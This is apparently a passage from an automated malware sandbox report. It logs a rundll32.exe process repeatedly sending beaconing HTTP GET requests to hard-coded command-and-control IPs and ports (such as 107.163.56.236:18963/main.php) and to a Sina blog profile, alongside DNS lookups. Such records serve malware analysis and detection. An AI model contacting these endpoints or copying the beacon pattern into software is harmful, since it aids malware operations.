                                                                                                                                    Dec 19, 2024 15:44:14.891725063 CET1.1.1.1192.168.2.70x3b86No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:44:14.891725063 CET1.1.1.1192.168.2.70x3b86No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:44:14.891725063 CET1.1.1.1192.168.2.70x3b86No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:44:14.891725063 CET1.1.1.1192.168.2.70x3b86No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:27.642301083 CET1.1.1.1192.168.2.70x9870No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:27.642301083 CET1.1.1.1192.168.2.70x9870No error (0)blogx.sina.com.cn116.133.8.92A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:51.648130894 CET1.1.1.1192.168.2.70xf368No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:51.648130894 CET1.1.1.1192.168.2.70xf368No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:51.648130894 CET1.1.1.1192.168.2.70xf368No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:51.648130894 CET1.1.1.1192.168.2.70xf368No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                                    Dec 19, 2024 15:45:51.648130894 CET1.1.1.1192.168.2.70xf368No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • blog.sina.com.cn
                                                                                                                                    • 107.163.56.235:18530
                                                                                                                                    • 107.163.56.110:18530
                                                                                                                                    • 107.163.56.236:18963

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.749706107.163.56.235185307816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:43:25.270073891 CET170OUTGET //joy.asp?sid=rungnejcodjgn0uWFe5vteX8v2LUicbtudb8mteZmdeYndG@ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible)
                                                                                                                                    Host: 107.163.56.235:18530
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749707107.163.56.110185307816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:43:25.270653009 CET185OUTGET /u1129.html HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.110:18530
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.749816107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:01.585722923 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.749817107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:01.585844994 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.749831116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:05.374687910 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.749834107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:05.716157913 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.749835116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:05.827719927 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:07.570759058 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:07 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.749836107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:05.827950954 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.749848107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:09.715462923 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.749849107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:09.834042072 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    10192.168.2.749850116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:09.843630075 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:11.622842073 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:11 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    11192.168.2.749860107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:13.805699110 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    12192.168.2.749861107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:13.926978111 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    13192.168.2.749869116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:15.795933008 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:17.689836025 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:17 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    14192.168.2.749874107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:17.779829025 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    15192.168.2.749875107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:17.893923044 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    16192.168.2.749876116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:17.896368980 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:19.604732990 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:19 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    17192.168.2.749889107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:21.814888000 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    18192.168.2.749890116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:21.986197948 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:24.545500040 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:24 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    19192.168.2.749891107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:21.990005970 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    20192.168.2.749903107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:25.950902939 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    21192.168.2.749904116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:26.065944910 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    22192.168.2.749905107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:26.066159964 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    23192.168.2.749916107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:29.966614008 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    24192.168.2.749917107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:30.080513954 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    25192.168.2.749918116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:30.081068039 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:32.696099997 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:32 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    26192.168.2.749931107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:33.984309912 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    27192.168.2.749932116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:34.096609116 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:35.942162991 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:35 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    28192.168.2.749933107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:34.098803043 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    29192.168.2.749941107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:37.996845961 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    30192.168.2.749942107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:38.114346027 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    31192.168.2.749948116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:39.137862921 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:40.914382935 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
